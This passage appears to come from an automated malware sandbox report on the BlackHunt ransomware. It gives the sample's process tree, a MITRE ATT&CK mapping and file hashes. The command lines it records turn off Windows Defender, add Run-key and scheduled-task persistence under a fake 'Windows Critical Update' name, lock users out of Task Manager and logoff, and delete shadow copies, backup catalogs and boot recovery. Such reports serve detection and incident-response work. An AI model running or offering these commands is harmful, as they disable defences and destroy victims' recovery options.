- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:4200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:3596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4464
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2716
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2428
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2348
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4348
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3536
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3748
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2080
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4556
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:3148
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1212
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:4104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:4892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1824
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2468
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1616
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe" /F2⤵PID:2672
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe" /F3⤵
- Creates scheduled task(s)
PID:3628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4108
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3320
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3372
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:3032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2860
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3620
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:4484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1960
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3612
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:4932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4180
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1612
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2832
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1716
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5596
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:6112
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:4432
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5e32f6917b93b0a1046d601b71065da2a
SHA151227ef7a2ae5b11943c4e557424b88551dd7148
SHA25661fe53553b49b55b98116c1673ad13eefacf7bd45c4f13a7313a6aed143a957a
SHA512971aa82e9dfa00076700361c2195c2589de8b65d4177a71b081a6f74111875f4353972caff052892841926a505f42c92ffb9dc8879c0dadb7f7bb1fb3d662f07
-
Filesize
684B
MD560ae0f3b6a3e5ed8d345f554d55b9160
SHA1eec4e43657bfd08ff24511f830e43c57b8766015
SHA25658d0650a01899254f5b12504aa851fec7b996e379132e1eabc0cde175732e161
SHA512dc7c935bc5e710952e320b87e5cacc1c6096f5be6cc6238d8e621ae19424fe7b791dbd47faf8e5bf02a6e1959ab08317f2b07b9942ac57b35e73aa9bb4d652ae
-
Filesize
1KB
MD57190a01be4cc8146a9c5932d8e36c266
SHA19020bf2165ba8a6d7ec56fb7e7097bb03be3e843
SHA256f8450c1c23e73c4ce2686c31e9982ae7672a6eee62c8cb0207791da15f818ca2
SHA51214ac6ace245c996823e576f2f523b1f7750e8b4a55757c77ed5a7ada0dcf21534930c793a17f42346cdf208dae8160ba515a9bef09173aa28ac06bb9ef376390